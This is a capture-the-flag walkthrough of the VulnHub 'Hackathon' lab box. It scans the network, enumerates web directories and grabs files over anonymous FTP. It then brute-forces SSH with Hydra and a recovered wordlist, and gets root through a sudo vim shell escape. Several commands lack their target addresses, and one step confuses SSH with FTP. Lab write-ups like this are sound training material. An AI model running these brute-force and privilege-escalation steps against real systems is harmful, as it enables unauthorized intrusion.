Hackathon CTF VulnHub | Writeup | Walkthrough

5 min readJun 25, 2024


Hello, friends I’m Shams Ul Mehmood and this is my 7th article. This article is a walkthrough of all about Hackathon CTF Box. It includes some type of security flaws like Enumeration, Network Scanning, Anonymous FTP logins, SSH Credential Brute-forcing and Abusing improperly set Root Privileges for Privilege Escalation. You can download this Vulnhub box from here.

Pentesting Methodology

  1. Getting the target machine IP Address by using arp-scan
  2. Getting open port details by using the Nmap Tool
  3. Enumerating HTTP service with Dirb / Nikto / Gobuster Utilities
  4. Enumerating FTP service and reading the first flag
  5. SSH brute-forcing with Hydra
  6. Getting the root and reading the flag


📌️ In the first step of the scanning, I used the arp-scan commands to perform a Local Network Scan to find out the IP Address of the target box.

Command : sudo arp-scan


📌️ In second step, after getting the victim machine’s IP address now I performed a Nmap scan to my victim. I used,

  • -sS : to scan running services.
  • -sV : to scan application version.
  • -p- : to scan all ports on victim machine.
  • -sC : to scan default script.
  • -Pn : to skip host discovery.
  • -O : to scan Operating System.
  • -A : to enable scanning for OS, version, script detection and traceroute

Command : sudo nmap -A -p- -Pn -O -sV -sC -sS


📌 In this step, I was trying to enumerate the HTTP webpage. When I open the victim ip address with default port 80 and http protocol in browser.

Command :

📌 I used the various tools like dirb, gobuster and nikto to enumerate interesting hidden files and directories on this target machine.

📌 Then I used dirb and nikto on victim ip address with default HTTP protocol and their port (80) and in this scan I found multiple directories and files like index.html and robots.txt.

Command : dirb

Command : nikto -h

📌 Then I used gobuster on victim ip address with default HTTP protocol and their port (80) and in this scan I found multiple directories and files like index.html, happy and robots.txt.

Command : sudo gobuster dir -w /usr/share/wordlists/dirb/big.txt -u


📌 In step-4th, here anonymous ftp access is allowed. Then, I was download the required files on Attacker machine from victim by using following command.

Command : wget -r

📌 Then I was list the various files and directory on current desktop directory then I was found a new directory named on my current directory, then after change my current directory then I was found two interesting files inside this directory.

Command : ls -al

Command : ls ./

Command : cd

Command : ls

📌 Then I was displayed the content of flag1.txt file.

Command : cat flag1.txt

📌 Then I was showed the content of word.dir file, there is a dictionary file which we can use to bruteforce different logins.

Command : cat word.dir


📌 In this step, Hydra is a tool that does online bruteforcing. On the other hand, there are offline password cracking tools as well like John the Ripper.

Command : ls

Command : hydra -l hackathonll -P word.dir ssh:// -I

📌 Next, I am going to use the dictionary list to bruteforce the SSH service running at port 7223. So, I logged in to the FTP server.

Command : ssh hackathonll@ -p 7223

Command : id

Command : whoami

Command : ls

Command : cd /

Command : sudo -l

📌 However, while searching for the next clue, I looked at my sudo permissions.

📌 Luckily, we could use vim editor as root without requiring the password of root.

Command : sudo -u root /usr/bin/vim

📌 I was used ‘:!sh’ command for the closing of vim editor, after I got the root shell and the root flag.

Command : id

Command : cd /root

Command : ls

Command : cat flag2.txt

CTF Game Over : I am Root!

\( ゚ヮ゚)/🏆 🏆🎯🏅 🚀